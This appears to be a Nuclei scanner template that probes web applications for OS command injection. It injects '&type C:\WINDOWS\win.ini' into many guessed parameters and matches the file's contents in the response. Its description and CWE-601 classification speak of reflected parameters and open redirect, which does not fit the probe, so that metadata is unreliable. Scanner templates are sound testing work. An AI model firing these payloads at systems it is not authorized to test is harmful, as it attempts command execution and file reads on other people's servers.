http:
- matchers:
  - status:
    - 200
    type: status
  - type: word
    words:
    - '[mci extensions]'
    - ADD-CMD100GAURAVGAURAV
  matchers-condition: and
  method: GET
  path:
  - '{{BaseURL}}?eval_base64=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&include=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&require=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&load=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&open=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&read=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&write=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&fetch=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&wget=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&curl=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini'
  - '{{BaseURL}}?backtick_cmd=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&os_cmd=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&exec_cmd=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&proc_open=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&popen=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&passthru=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini&system_exec=%26type%20C%3A%5C%5CWINDOWS%5C%5Cwin.ini'
id: 8rcepost-29
info:
  author: erickfernandox
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  description: 'Verifica parametros ocultos que refletem dentro do HTML da pagina

    '
  metadata:
    max-request: 2
  name: 8rcepost
  severity: medium
  tags: fuzzer, generic
